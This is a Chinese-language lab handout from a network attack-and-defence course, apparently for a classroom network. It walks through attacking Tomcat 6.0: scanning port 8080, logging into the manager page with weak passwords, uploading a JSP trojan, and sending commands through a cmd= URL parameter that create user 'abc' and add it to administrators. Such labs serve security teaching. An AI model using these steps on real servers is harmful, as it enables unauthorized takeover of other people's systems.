第2个实验 Tomcat6.0的漏洞攻击1(网络攻防教程)
合集下载
相关主题
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
实验二Tomcat6.0的漏洞攻击
【实验目的】
通过端口扫描工具扫描8080端口,猜测弱口令:空admin 。
【实验环境】
系统环境:Windows2003及以上操作系统
软件工具:scanport
【实验内容】
1.使用Scanport工具扫描8080端口;
2.扫描后,得到一些主机IP,选中其中一台,例如:172.16.28.242
然后在地址栏中,进行这样的访问:
http://172.16.28.242:8080/manager/html
如果跳出登录窗口,请输入用户名:admin 密码:空或admin
或123456;
3.如果第2步登录成功,上传老师给的JSP木马。
4.在网址中利用命令,格式如下:
查看用户
http://172.16.28.242:8080/index1/index.jsp?cmd=net user
新建用户:
http://172.16.28.242:8080/index1/index.jsp?cmd=net user abc 123456 /add 升为超级管理员:
http://172.16.28.242:8080/index1/index.jsp?cmd=net localgroup
administrators abc /add